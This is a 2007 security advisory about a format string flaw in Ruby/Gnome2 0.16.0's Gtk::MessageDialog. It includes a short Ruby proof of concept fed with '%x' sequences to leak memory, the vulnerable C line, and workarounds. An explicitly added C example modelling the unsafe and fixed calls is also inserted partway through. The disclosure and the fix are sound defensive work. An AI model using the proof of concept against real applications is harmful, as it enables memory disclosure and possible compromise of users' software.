Network Security Vuln-Dev

Ruby/Gnome2 0.16.0 Format String Vulnerability

Subject: Ruby/Gnome2 0.16.0 Format String Vulnerability
Date: 27 Nov 2007 12:16:58 -0000
RubyGnome2 0.16.0
Format String Vulnerability In Gtk::MessageDialog
http://em386.blogspot.com

Ruby/Gnome2 is a project that provides GTK2 bindings for Ruby scripts so you can
write GUI code in less time. There is a format string vulnerability in
Gtk::MessageDialog(). Because of this design flaw there is no way to pass a
user-generated string safely to this function.

It is really just a thin wrapper around the GTK2 function gtk_message_dialog_new().
Ruby/Gnome2 does not supply a format specifier for the message variable in
ruby-gnome2-all-0.16.0/gtk/src/rbgtkmessagedialog.c, as the Gtk man page for
this function requires.

...
/* the Ruby string is passed straight through as the printf-style format argument */
w = gtk_message_dialog_new(NIL_P(parent) ? NULL : GTK_WINDOW(RVAL2GOBJ(parent)),
                           RVAL2GFLAGS(flags, GTK_TYPE_DIALOG_FLAGS),
                           RVAL2GENUM(type, GTK_TYPE_MESSAGE_TYPE),
                           RVAL2GENUM(buttons, GTK_TYPE_BUTTONS_TYPE),
                           (const gchar*)(NIL_P(message) ? "" : RVAL2CSTR(message)));
...

The GTK2 documentation:
http://www.gtk.org/api/2.6/gtk/GtkMessageDialog.html#gtk-message-dialog-new
states that message should be a 'printf style format string' followed by the
arguments it refers to. The Ruby binding does not expose those arguments, so
whatever string the Ruby script passes becomes the format string itself.

The vulnerability can be exploited by sending a specially crafted string to the
function. An example Ruby program is provided as a proof of concept.

...
#!/usr/bin/env ruby
# ruby rubber.rb %x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x

require 'libglade2'

# the attacker-controlled string comes straight from the command line
my_string = ARGV[0]

# @main_app_window is unset here (nil), so the dialog has no parent window.
# Ruby's % interpolates my_string into the message; the C binding then uses
# the resulting message as the printf-style format string.
dialog = Gtk::MessageDialog.new(@main_app_window, Gtk::Dialog::MODAL,
                                Gtk::MessageDialog::INFO,
                                Gtk::MessageDialog::BUTTONS_CLOSE,
                                "%s - Was your string!" % my_string)
dialog.run
dialog.destroy
...

A temporary workaround for this vulnerability is to use the markup member:

dialog.markup = "#{my_string} - Was your string!"

Or escape every percent sign before the string reaches the binding:

my_string = my_string.gsub(/%/, "%%")
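The following is an added example, not code from the advisory or from Ruby/Gnome2. It models the two calling conventions discussed above (the 0.16.0 binding's pattern of passing the message as the format argument, and the corrected pattern of a fixed "%s" format with the message as its argument) against a stand-in for gtk_message_dialog_new() that renders into a buffer instead of a dialog, and it implements the percent-escaping workaround in C to show why it survives one pass through a printf-style formatter. All function names (render_message, unsafe_binding, fixed_binding, escape_percent, has_format_directive) and the sample message are assumptions of this example; nothing here links against GTK.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for gtk_message_dialog_new() (example code, not GTK): like the
 * real function, `fmt` is a printf-style format followed by its arguments.
 * The text is rendered into `out` instead of a dialog. */
static int render_message(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
    return n;
}

/* The 0.16.0 pattern: the Ruby string becomes the format argument, so every
 * '%' sequence in it is interpreted. Only safe for messages with no
 * unescaped '%' (callers below only pass such strings). */
int unsafe_binding(char *out, size_t outlen, const char *message)
{
    return render_message(out, outlen, message);
}

/* Corrected pattern: fixed "%s" format, message as the argument, so the
 * message is copied verbatim whatever it contains. */
int fixed_binding(char *out, size_t outlen, const char *message)
{
    return render_message(out, outlen, "%s", message);
}

/* The post's Ruby-side workaround (gsub(/%/, "%%")) done in C: double every
 * '%' so one pass through a printf-style formatter restores the original.
 * Returns the length written, or -1 if `out` is too small. */
int escape_percent(char *out, size_t outlen, const char *in)
{
    size_t j = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        size_t need = (in[i] == '%') ? 2 : 1;
        if (j + need >= outlen)
            return -1;
        out[j++] = in[i];
        if (in[i] == '%')
            out[j++] = '%';
    }
    out[j] = '\0';
    return (int)j;
}

/* Audit helper: 1 if `s` contains a '%' that a printf-style formatter would
 * treat as a conversion (i.e. not part of a literal "%%"), else 0. */
int has_format_directive(const char *s)
{
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] != '%')
            continue;
        if (s[i + 1] == '%') {
            i++;                     /* "%%" is a literal percent sign */
            continue;
        }
        return 1;
    }
    return 0;
}

/* 1 if escaping then passing through the unsafe path gives back `msg`. */
int roundtrip_unchanged(const char *msg)
{
    char esc[256], out[256];
    if (escape_percent(esc, sizeof esc, msg) < 0)
        return 0;
    unsafe_binding(out, sizeof out, esc);
    return strcmp(out, msg) == 0;
}

/* 1 if the fixed binding reproduces `msg` verbatim. */
int fixed_unchanged(const char *msg)
{
    char out[256];
    fixed_binding(out, sizeof out, msg);
    return strcmp(out, msg) == 0;
}

int main(void)
{
    const char *msg = "100% done";   /* constructed sample message */
    printf("fixed binding keeps \"%%x.%%x\": %d\n", fixed_unchanged("%x.%x"));
    printf("escape workaround round-trips: %d\n", roundtrip_unchanged(msg));
    printf("directive in \"%s\": %d\n", msg, has_format_directive(msg));
    return 0;
}
```

The fix that matters is fixed_binding: once the binding supplies its own "%s", the Ruby caller cannot influence the format string at all, which is why the percent-escaping workaround is only a stopgap for unpatched 0.16.0 installs. has_format_directive is the check an auditor can run over strings that reach such an API to flag the unescaped '%' that the unsafe path would interpret.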

I have found a few ruby/gnome2 apps out there that use the API in this unsafe
manner.

Fixed Nov 27th 2007 in Ruby/Gnome2 SVN

From: chris . rohlf